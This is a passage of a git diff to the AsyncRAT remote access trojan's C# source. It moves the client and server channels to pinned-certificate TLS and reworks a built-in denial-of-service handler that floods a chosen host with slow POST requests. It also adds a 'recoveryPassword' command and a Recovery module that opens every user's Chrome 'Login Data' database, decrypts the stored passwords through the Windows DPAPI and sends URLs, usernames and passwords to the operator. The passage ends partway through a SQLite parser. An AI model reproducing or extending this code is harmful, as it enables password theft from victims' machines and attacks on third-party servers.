ClientMS.Dispose(); + ClientMS = new MemoryStream(); + if (ClientBuffersize > 0) + { + ClientBuffer = new byte[ClientBuffersize]; + Debug.WriteLine("/// Server Buffersize " + ClientBuffersize.ToString() + " Bytes ///"); + ClientBufferRecevied = true; + } } } else { - await ClientMS.WriteAsync(ClientBuffer, 0, Recevied); Settings.Received += Recevied; BytesRecevied += Recevied; if (ClientMS.Length == ClientBuffersize) { - ThreadPool.QueueUserWorkItem(Packet.Read, new object[] {ClientMS.ToArray(), this }); + ThreadPool.QueueUserWorkItem(Packet.Read, new object[] { ClientMS.ToArray(), this }); ClientBuffer = new byte[4]; ClientMS.Dispose(); ClientMS = new MemoryStream(); @@ -77,7 +96,7 @@ namespace AsyncRAT_Sharp.Sockets else ClientBuffer = new byte[ClientBuffersize - ClientMS.Length]; } - ClientSocket.BeginReceive(ClientBuffer, 0, ClientBuffer.Length, SocketFlags.None, ReadClientData, null); + ClientSslStream.BeginRead(ClientBuffer, 0, ClientBuffer.Length, ReadClientData, null); } else { @@ -121,6 +140,7 @@ namespace AsyncRAT_Sharp.Sockets try { + ClientSslStream?.Dispose(); ClientSocket?.Dispose(); ClientMS?.Dispose(); } @@ -141,12 +161,15 @@ namespace AsyncRAT_Sharp.Sockets if ((byte[])msg == null) return; - byte[] buffer = Settings.AES.Encrypt((byte[])msg); + byte[] buffer = (byte[])msg; byte[] buffersize = BitConverter.GetBytes(buffer.Length); ClientSocket.Poll(-1, SelectMode.SelectWrite); - ClientSocket.BeginSend(buffersize, 0, buffersize.Length, SocketFlags.None, EndSend, null); - ClientSocket.BeginSend(buffer, 0, buffer.Length, SocketFlags.None, EndSend, null); + ClientSslStream.Write(buffersize, 0, buffersize.Length); + ClientSslStream.Write(buffer, 0, buffer.Length); + ClientSslStream.Flush(); + Debug.WriteLine("/// Server Sent " + buffer.Length.ToString() + " Bytes ///"); + Settings.Sent += buffer.Length; } catch { @@ -157,53 +180,27 @@ namespace AsyncRAT_Sharp.Sockets } } - private void EndSend(IAsyncResult ar) - { - lock (EndSendSync) - { - try - { - if (!ClientSocket.Connected) - { - Disconnected(); - return; - } - - int sent = 0; - sent = ClientSocket.EndSend(ar); - Debug.WriteLine("/// Server Sent " + sent.ToString() + " Bytes ///"); - Settings.Sent += sent; - } - catch - { - Disconnected(); - return; - } - } - } - public void Ping(object obj) { lock (SendSync) { - lock (EndSendSync) + + try { - try - { - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "Ping"; - msgpack.ForcePathObject("Message").AsString = "This is a ping!"; - byte[] buffer = Settings.AES.Encrypt(msgpack.Encode2Bytes()); - byte[] buffersize = BitConverter.GetBytes(buffer.Length); - ClientSocket.Poll(-1, SelectMode.SelectWrite); - ClientSocket.Send(buffersize, 0, buffersize.Length, SocketFlags.None); - ClientSocket.Send(buffer, 0, buffer.Length, SocketFlags.None); - } - catch - { - Disconnected(); - return; - } + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "Ping"; + msgpack.ForcePathObject("Message").AsString = "This is a ping!"; + byte[] buffer = msgpack.Encode2Bytes(); + byte[] buffersize = BitConverter.GetBytes(buffer.Length); + ClientSocket.Poll(-1, SelectMode.SelectWrite); + ClientSslStream.Write(buffersize, 0, buffersize.Length); + ClientSslStream.Write(buffer, 0, buffer.Length); + ClientSslStream.Flush(); + } + catch + { + Disconnected(); + return; } } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/packages.config b/AsyncRAT-C#/AsyncRAT-Sharp/packages.config index d976469..f0824a4 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/packages.config +++ b/AsyncRAT-C#/AsyncRAT-Sharp/packages.config @@ -1,4 +1,5 @@  + \ No newline at end of file diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index 4fc68ff..356dc45 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -72,10 +72,13 @@ + + + @@ -99,6 +102,8 @@ + + diff --git a/AsyncRAT-C#/Client/Cryptography/Sha256.cs b/AsyncRAT-C#/Client/Cryptography/Sha256.cs new file mode 100644 index 0000000..c8a2453 --- /dev/null +++ b/AsyncRAT-C#/Client/Cryptography/Sha256.cs @@ -0,0 +1,33 @@ +using System.Security.Cryptography; +using System.Text; + +namespace Client.Cryptography +{ + public static class Sha256 + { + public static string ComputeHash(string input) + { + byte[] data = Encoding.UTF8.GetBytes(input); + + using (SHA256Managed sha = new SHA256Managed()) + { + data = sha.ComputeHash(data); + } + + StringBuilder hash = new StringBuilder(); + + foreach (byte _byte in data) + hash.Append(_byte.ToString("X2")); + + return hash.ToString().ToUpper(); + } + + public static byte[] ComputeHash(byte[] input) + { + using (SHA256Managed sha = new SHA256Managed()) + { + return sha.ComputeHash(input); + } + } + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs b/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs index 58a8ebf..cdfa010 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs @@ -30,7 +30,7 @@ namespace Client.Handle_Packet host = new Uri(unpack_msgpack.ForcePathObject("Host").AsString).DnsSafeHost; port = Convert.ToInt32(unpack_msgpack.ForcePathObject("port").AsString); timeout = Convert.ToInt32(unpack_msgpack.ForcePathObject("timeout").AsString) * 60; - List listOfClients = new List(); + List SocketList = new List(); TimeSpan timespan = TimeSpan.FromSeconds(timeout); Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); @@ -42,11 +42,12 @@ namespace Client.Handle_Packet { try { - TcpClient tcp = new TcpClient(host.ToString(), port); - listOfClients.Add(tcp); + Socket tcp = new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp); + tcp.Connect(host.ToString(), port); + SocketList.Add(tcp); string post = $"POST / HTTP/1.1\r\nHost: {host} \r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: {userAgents[new Random().Next(userAgents.Length)]}\r\nContent-length: 5235\r\n\r\n"; byte[] buffer = Encoding.UTF8.GetBytes(post); - tcp.Client.Send(buffer, 0, buffer.Length, SocketFlags.None); + tcp.Send(buffer, 0, buffer.Length, SocketFlags.None); } catch { @@ -57,9 +58,9 @@ namespace Client.Handle_Packet } Thread.Sleep(1000); - foreach (TcpClient tcp in listOfClients.ToList()) + foreach (Socket tcp in SocketList.ToList()) { - tcp?.Client.Dispose(); + tcp?.Dispose(); } } diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs b/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs index 471190a..a34ea55 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs @@ -9,6 +9,10 @@ using System.Linq; using System.Text; using System.Diagnostics; using System.Net.Sockets; +using System.Security.Authentication; +using System.Net.Security; +using System.Security.Cryptography.X509Certificates; + namespace Client.Handle_Packet { public class FileManager @@ -97,6 +101,8 @@ namespace Client.Handle_Packet SendBufferSize = 50 * 1024, }; Client.Connect(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[1])); + SslStream SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate); + SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "socketDownload"; @@ -104,7 +110,7 @@ namespace Client.Handle_Packet msgpack.ForcePathObject("DWID").AsString = dwid; msgpack.ForcePathObject("File").AsString = file; msgpack.ForcePathObject("Size").AsString = new FileInfo(file).Length.ToString(); - ChunkSend(Settings.aes256.Encrypt(msgpack.Encode2Bytes()), Client); + ChunkSend(msgpack.Encode2Bytes(), Client, SslClient); MsgPack msgpack2 = new MsgPack(); @@ -113,7 +119,7 @@ namespace Client.Handle_Packet msgpack2.ForcePathObject("DWID").AsString = dwid; msgpack2.ForcePathObject("Name").AsString = Path.GetFileName(file); msgpack2.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(file)); - ChunkSend(Settings.aes256.Encrypt(msgpack2.Encode2Bytes()), Client); + ChunkSend(msgpack2.Encode2Bytes(), Client, SslClient); Client.Shutdown(SocketShutdown.Both); Client.Dispose(); @@ -124,17 +130,17 @@ namespace Client.Handle_Packet } } - private void ChunkSend(byte[] msg, Socket client) + private void ChunkSend(byte[] msg, Socket client, SslStream ssl) { try { byte[] buffersize = BitConverter.GetBytes(msg.Length); client.Poll(-1, SelectMode.SelectWrite); - client.Send(buffersize); + ssl.Write(buffersize); + ssl.Flush(); int chunkSize = 50 * 1024; byte[] chunk = new byte[chunkSize]; - int SendPackage; using (MemoryStream buffereReader = new MemoryStream(msg)) { BinaryReader binaryReader = new BinaryReader(buffereReader); @@ -143,7 +149,8 @@ namespace Client.Handle_Packet { chunk = binaryReader.ReadBytes(chunkSize); bytesToRead -= chunkSize; - SendPackage = client.Send(chunk); + ssl.Write(chunk); + ssl.Flush(); } while (bytesToRead > 0); binaryReader.Dispose(); @@ -154,5 +161,14 @@ namespace Client.Handle_Packet return; } } + + private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { +#if DEBUG + return true; +#endif + return Settings.ServerCertificate.Equals(certificate); + } + } } diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs b/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs index 08bc3cb..2d3bca1 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs @@ -10,6 +10,9 @@ using Client.Helper; using System; using Client.StreamLibrary.UnsafeCodecs; using Client.StreamLibrary; +using System.Net.Security; +using System.Security.Cryptography.X509Certificates; +using System.Security.Authentication; namespace Client.Handle_Packet { @@ -22,6 +25,9 @@ namespace Client.Handle_Packet Socket Client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); Client.Connect(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[1])); + SslStream SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate); + SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); + string hwid = Methods.HWID(); IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(quality); while (Client.Connected) @@ -42,8 +48,10 @@ namespace Client.Handle_Packet msgpack.ForcePathObject("ID").AsString = hwid; msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray()); - Client.Send(BitConverter.GetBytes(Settings.aes256.Encrypt(msgpack.Encode2Bytes()).Length)); - Client.Send(Settings.aes256.Encrypt(msgpack.Encode2Bytes())); + SslClient.Write(BitConverter.GetBytes(msgpack.Encode2Bytes().Length)); + SslClient.Write(msgpack.Encode2Bytes()); + SslClient.Flush(); + Thread.Sleep(100); } } bmp.UnlockBits(bmpData); @@ -66,5 +74,14 @@ namespace Client.Handle_Packet } catch { return new Bitmap(rect.Width, rect.Height); } } + + private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { +#if DEBUG + return true; +#endif + return Settings.ServerCertificate.Equals(certificate); + } + } } diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index eac8782..57f03ba 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -7,6 +7,7 @@ using System.Net.Sockets; using System.Text; using System.Threading; using System.Windows.Forms; +using Client.Recovery; namespace Client.Handle_Packet { @@ -19,7 +20,7 @@ namespace Client.Handle_Packet try { MsgPack unpack_msgpack = new MsgPack(); - unpack_msgpack.DecodeFromBytes(Settings.aes256.Decrypt((byte[])data)); + unpack_msgpack.DecodeFromBytes((byte[])data); switch (unpack_msgpack.ForcePathObject("Packet").AsString) { case "sendMessage": @@ -55,6 +56,12 @@ namespace Client.Handle_Packet break; } + case "recoveryPassword": + { + new Recovery.Recovery(); + break; + } + case "defender": { new HandleWindowsDefender(); diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs index 6bd0f4f..6c353ca 100644 --- a/AsyncRAT-C#/Client/Program.cs +++ b/AsyncRAT-C#/Client/Program.cs @@ -11,6 +11,10 @@ using Client.Helper; // This program Is distributed for educational purposes only. +// Credits; +// Serialization @ymofen +// StreamLibrary @Dergan +// Special Thanks MaxXor@hf gigajew@hf namespace Client { diff --git a/AsyncRAT-C#/Client/Recovery/Recovery.cs b/AsyncRAT-C#/Client/Recovery/Recovery.cs new file mode 100644 index 0000000..66f2344 --- /dev/null +++ b/AsyncRAT-C#/Client/Recovery/Recovery.cs @@ -0,0 +1,219 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; +using Client.MessagePack; +using Client.Sockets; + +namespace Client.Recovery +{ + internal class Recovery + { + public string Pass; + + public void recoverAll() + { + recoverChrome(); + } + + public Recovery() + { + this.Drive = Drive = new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)); + recoverAll(); + if (Pass.Length > 1) + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; + msgpack.ForcePathObject("Password").AsString = Pass; + ClientSocket.Send(msgpack.Encode2Bytes()); + } + } + + public DriveInfo Drive; + + private bool isWindowsXP() + { + return (Environment.OSVersion.Version.Major == 5); + } + + private string[] GetAppDataFolders() + { + List iList = new List(); + if (isWindowsXP()) + { + foreach (string Dir in Directory.GetDirectories(Drive.RootDirectory.FullName + @"Documents and Settings\", "*", SearchOption.TopDirectoryOnly)) + iList.Add(Dir + "Application Data"); + } + else + foreach (string Dir in Directory.GetDirectories(Drive.RootDirectory.FullName + @"Users\", "*", SearchOption.TopDirectoryOnly)) + { + DirectoryInfo dirInfo = new DirectoryInfo(Dir); + iList.Add(Drive.RootDirectory.FullName + @"Users\" + dirInfo.Name + @"\AppData"); + } + return iList.ToArray(); + } + + + [DllImport("Crypt32.dll", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] + [return: MarshalAs(UnmanagedType.Bool)] + private static extern bool CryptProtectData( + ref DATA_BLOB pDataIn, + String szDataDescr, + ref DATA_BLOB pOptionalEntropy, + IntPtr pvReserved, + ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, + CryptProtectFlags dwFlags, + ref DATA_BLOB pDataOut +); + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + private struct DATA_BLOB + { + public int cbData; + public IntPtr pbData; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + private struct CRYPTPROTECT_PROMPTSTRUCT + { + public int cbSize; + public CryptProtectPromptFlags dwPromptFlags; + public IntPtr hwndApp; + public String szPrompt; + } + + [Flags] + private enum CryptProtectPromptFlags + { + // prompt on unprotect + CRYPTPROTECT_PROMPT_ON_UNPROTECT = 0x1, + + // prompt on protect + CRYPTPROTECT_PROMPT_ON_PROTECT = 0x2 + } + + [Flags] + private enum CryptProtectFlags + { + // for remote-access situations where ui is not an option + // if UI was specified on protect or unprotect operation, the call + // will fail and GetLastError() will indicate ERROR_PASSWORD_RESTRICTION + CRYPTPROTECT_UI_FORBIDDEN = 0x1, + + // per machine protected data -- any user on machine where CryptProtectData + // took place may CryptUnprotectData + CRYPTPROTECT_LOCAL_MACHINE = 0x4, + + // force credential synchronize during CryptProtectData() + // Synchronize is only operation that occurs during this operation + CRYPTPROTECT_CRED_SYNC = 0x8, + + // Generate an Audit on protect and unprotect operations + CRYPTPROTECT_AUDIT = 0x10, + + // Protect data with a non-recoverable key + CRYPTPROTECT_NO_RECOVERY = 0x20, + + // Verify the protection of a protected blob + CRYPTPROTECT_VERIFY_PROTECTION = 0x40 + } + + [ +DllImport("Crypt32.dll", +SetLastError = true, +CharSet = System.Runtime.InteropServices.CharSet.Auto) +] + [return: MarshalAs(UnmanagedType.Bool)] + private static extern bool CryptUnprotectData( + ref DATA_BLOB pDataIn, + StringBuilder szDataDescr, + ref DATA_BLOB pOptionalEntropy, + IntPtr pvReserved, + ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, + CryptProtectFlags dwFlags, + ref DATA_BLOB pDataOut +); + + + private string Decrypt(byte[] Datas) + { + try + { + DATA_BLOB inj, Ors = new DATA_BLOB(); + DATA_BLOB asd = new DATA_BLOB(); + GCHandle Ghandle = GCHandle.Alloc(Datas, GCHandleType.Pinned); + inj.pbData = Ghandle.AddrOfPinnedObject(); + inj.cbData = Datas.Length; + Ghandle.Free(); + CRYPTPROTECT_PROMPTSTRUCT asdf = new CRYPTPROTECT_PROMPTSTRUCT(); + string aha = string.Empty; + CryptUnprotectData(ref inj, null, ref asd, default(IntPtr), ref asdf, 0, ref Ors); + + // ref DATA_BLOB pDataIn, + //StringBuilder szDataDescr, + // ref DATA_BLOB pOptionalEntropy, + // IntPtr pvReserved, + // ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, + // CryptProtectFlags dwFlags, + // ref DATA_BLOB pDataOut + + byte[] Returned = new byte[Ors.cbData + 1]; + Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData); + string TheString = Encoding.UTF8.GetString(Returned); + return TheString.Substring(0, TheString.Length - 1); + } + catch + { + return ""; + } + } + + public void recoverChrome() + { + try + { + foreach (string AppData in GetAppDataFolders()) + { + try + { + if (!File.Exists(AppData + @"\Local\Google\Chrome\User Data\Default\Login Data")) + continue; + SQLiteHandler sql = new SQLiteHandler(AppData + @"\Local\Google\Chrome\User Data\Default\Login Data"); + + try + { + sql.ReadTable("logins"); + } + catch { } + + for (int i = 0; i <= sql.GetRowCount() - 1; i++) + { + string url = sql.GetValue(i, "origin_url"); + string username = sql.GetValue(i, "username_value"); + string password_crypted = sql.GetValue(i, "password_value"); + string password = string.Empty; + if (!string.IsNullOrEmpty(password_crypted)) + { + password = Decrypt(Encoding.Default.GetBytes(password_crypted)); + } + else + { + password = ""; + } + + // Format like this: + // Type \n URL \n User \n Pass \n\n + Pass += "Chrome\n" + url + "\n" + username + "\n" + password + "\n\n"; + } + } + catch (Exception eax) + { + Console.WriteLine(eax.ToString()); + } + } + } + catch { } + } + } +} \ No newline at end of file diff --git a/AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs b/AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs new file mode 100644 index 0000000..1f794e0 --- /dev/null +++ b/AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs @@ -0,0 +1,473 @@ +using Microsoft.VisualBasic; +using Microsoft.VisualBasic.CompilerServices; +using System; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; + +namespace Client.Recovery +{ + public class SQLiteHandler + { + private byte[] db_bytes; + private ulong encoding; + private string[] field_names; + private sqlite_master_entry[] master_table_entries; + private ushort page_size; + private byte[] SQLDataTypeSize = new byte[] { 0, 1, 2, 3, 4, 6, 8, 8, 0, 0 }; + private table_entry[] table_entries; + + public SQLiteHandler(string baseName) + { + if (File.Exists(baseName)) + { + FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1); + string str = Strings.Space((int)FileSystem.LOF(1)); + FileSystem.FileGet(1, ref str, -1L, false); + FileSystem.FileClose(new int[] { 1 }); + this.db_bytes = Encoding.Default.GetBytes(str); + if (Encoding.Default.GetString(this.db_bytes, 0, 15).CompareTo("SQLite format 3") != 0) + { + throw new Exception("Not a valid SQLite 3 Database File"); + } + if (this.db_bytes[0x34] != 0) + { + throw new Exception("Auto-vacuum capable database is not supported"); + } + //if (decimal.Compare(new decimal(this.ConvertToInteger(0x2c, 4)), 4M) >= 0) + //{ + // throw new Exception("No supported Schema layer file-format"); + //} + this.page_size = (ushort)this.ConvertToInteger(0x10, 2); + this.encoding = this.ConvertToInteger(0x38, 4); + if (decimal.Compare(new decimal(this.encoding), decimal.Zero) == 0) + { + this.encoding = 1L; + } + this.ReadMasterTable(100L); + } + } + + private ulong ConvertToInteger(int startIndex, int Size) + { + if ((Size > 8) | (Size == 0)) + { + return 0L; + } + ulong num2 = 0L; + int num4 = Size - 1; + for (int i = 0; i <= num4; i++) + { + num2 = (num2 << 8) | this.db_bytes[startIndex + i]; + } + return num2; + } + + private long CVL(int startIndex, int endIndex) + { + endIndex++; + byte[] buffer = new byte[8]; + int num4 = endIndex - startIndex; + bool flag = false; + if ((num4 == 0) | (num4 > 9)) + { + return 0L; + } + if (num4 == 1) + { + buffer[0] = (byte)(this.db_bytes[startIndex] & 0x7f); + return BitConverter.ToInt64(buffer, 0); + } + if (num4 == 9) + { + flag = true; + } + int num2 = 1; + int num3 = 7; + int index = 0; + if (flag) + { + buffer[0] = this.db_bytes[endIndex - 1]; + endIndex--; + index = 1; + } + int num7 = startIndex; + for (int i = endIndex - 1; i >= num7; i += -1) + { + if ((i - 1) >= startIndex) + { + buffer[index] = (byte)((((byte)(this.db_bytes[i] >> ((num2 - 1) & 7))) & (((int)0xff) >> num2)) | ((byte)(this.db_bytes[i - 1] << (num3 & 7)))); + num2++; + index++; + num3--; + } + else if (!flag) + { + buffer[index] = (byte)(((byte)(this.db_bytes[i] >> ((num2 - 1) & 7))) & (((int)0xff) >> num2)); + } + } + return BitConverter.ToInt64(buffer, 0); + } + + public int GetRowCount() + { + return this.table_entries.Length; + } + + public string[] GetTableNames() + { + string[] strArray2 = null; + int index = 0; + int num3 = this.master_table_entries.Length - 1; + for (int i = 0; i <= num3; i++) + { + if (this.master_table_entries[i].item_type == "table") + { + strArray2 = (string[])Utils.CopyArray((Array)strArray2, new string[index + 1]); + strArray2[index] = this.master_table_entries[i].item_name; + index++; + } + } + return strArray2; + } + + public string GetValue(int row_num, int field) + { + if (row_num >= this.table_entries.Length) + { + return null; + } + if (field >= this.table_entries[row_num].content.Length) + { + return null; + } + return this.table_entries[row_num].content[field]; + } + + public string GetValue(int row_num, string field) + { + int num = -1; + int length = this.field_names.Length - 1; + for (int i = 0; i <= length; i++) + { + if (this.field_names[i].ToLower().CompareTo(field.ToLower()) == 0) + { + num = i; + break; + } + } + if (num == -1) + { + return null; + } + return this.GetValue(row_num, num); + } + + private int GVL(int startIndex) + { + if (startIndex > this.db_bytes.Length) + { + return 0; + } + int num3 = startIndex + 8; + for (int i = startIndex; i <= num3; i++) + { + if (i > (this.db_bytes.Length - 1)) + { + return 0; + } + if ((this.db_bytes[i] & 0x80) != 0x80) + { + return i; + } + } + return (startIndex + 8); + } + + private bool IsOdd(long value) + { + return ((value & 1L) == 1L); + } + + private void ReadMasterTable(ulong Offset) + { + if (this.db_bytes[(int)Offset] == 13) + { + ushort num2 = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One)); + int length = 0; + if (this.master_table_entries != null) + { + length = this.master_table_entries.Length; + this.master_table_entries = (sqlite_master_entry[])Utils.CopyArray((Array)this.master_table_entries, new sqlite_master_entry[(this.master_table_entries.Length + num2) + 1]); + } + else + { + this.master_table_entries = new sqlite_master_entry[num2 + 1]; + } + int num13 = num2; + for (int i = 0; i <= num13; i++) + { + ulong num = this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2); + if (decimal.Compare(new decimal(Offset), 100M) != 0) + { + num += Offset; + } + int endIndex = this.GVL((int)num); + long num7 = this.CVL((int)num, endIndex); + int num6 = this.GVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One))); + this.master_table_entries[length + i].row_id = this.CVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num6); + num = Convert.ToUInt64(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(num6), new decimal(num))), decimal.One)); + endIndex = this.GVL((int)num); + num6 = endIndex; + long num5 = this.CVL((int)num, endIndex); + long[] numArray = new long[5]; + int index = 0; + do + { + endIndex = num6 + 1; + num6 = this.GVL(endIndex); + numArray[index] = this.CVL(endIndex, num6); + if (numArray[index] > 9L) + { + if (this.IsOdd(numArray[index])) + { + numArray[index] = (long)Math.Round((double)(((double)(numArray[index] - 13L)) / 2.0)); + } + else + { + numArray[index] = (long)Math.Round((double)(((double)(numArray[index] - 12L)) / 2.0)); + } + } + else + { + numArray[index] = this.SQLDataTypeSize[(int)numArray[index]]; + } + index++; + } + while (index <= 4); + if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0) + { + this.master_table_entries[length + i].item_type = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]); + } + else if (decimal.Compare(new decimal(this.encoding), 2M) == 0) + { + this.master_table_entries[length + i].item_type = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]); + } + else if (decimal.Compare(new decimal(this.encoding), 3M) == 0) + { + this.master_table_entries[length + i].item_type = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]); + } + if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0) + { + this.master_table_entries[length + i].item_name = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]); + } + else if (decimal.Compare(new decimal(this.encoding), 2M) == 0) + { + this.master_table_entries[length + i].item_name = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]); + } + else if (decimal.Compare(new decimal(this.encoding), 3M) == 0) + { + this.master_table_entries[length + i].item_name = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]); + } + this.master_table_entries[length + i].root_num = (long)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2]))), (int)numArray[3]); + if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0) + { + this.master_table_entries[length + i].sql_statement = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]); + } + else if (decimal.Compare(new decimal(this.encoding), 2M) == 0) + { + this.master_table_entries[length + i].sql_statement = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]); + } + else if (decimal.Compare(new decimal(this.encoding), 3M) == 0) + { + this.master_table_entries[length + i].sql_statement = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]); + } + } + } + else if (this.db_bytes[(int)Offset] == 5) + { + ushort num11 = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One)); + int num14 = num11; + for (int j = 0; j <= num14; j++) + { + ushort startIndex = (ushort)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(j * 2))), 2); + if (decimal.Compare(new decimal(Offset), 100M) == 0) + { + this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(startIndex, 4)), decimal.One), new decimal(this.page_size)))); + } + else + { + this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)(Offset + startIndex), 4)), decimal.One), new decimal(this.page_size)))); + } + } + this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)), decimal.One), new decimal(this.page_size)))); + } + } + + public bool ReadTable(string TableName) + { + int index = -1; + int length = this.master_table_entries.Length - 1; + for (int i = 0; i <= length; i++) + { + if (this.master_table_entries[i].item_name.ToLower().CompareTo(TableName.ToLower()) == 0) + { + index = i; + break; + } + } + if (index == -1) + { + return false; + } + string[] strArray = this.master_table_entries[index].sql_statement.Substring(this.master_table_entries[index].sql_statement.IndexOf("(") + 1).Split(new char[] { ',' }); + int num6 = strArray.Length - 1; + for (int j = 0; j <= num6; j++) + { + strArray[j] = (strArray[j]).TrimStart(); + int num4 = strArray[j].IndexOf(" "); + if (num4 > 0) + { + strArray[j] = strArray[j].Substring(0, num4); + } + if 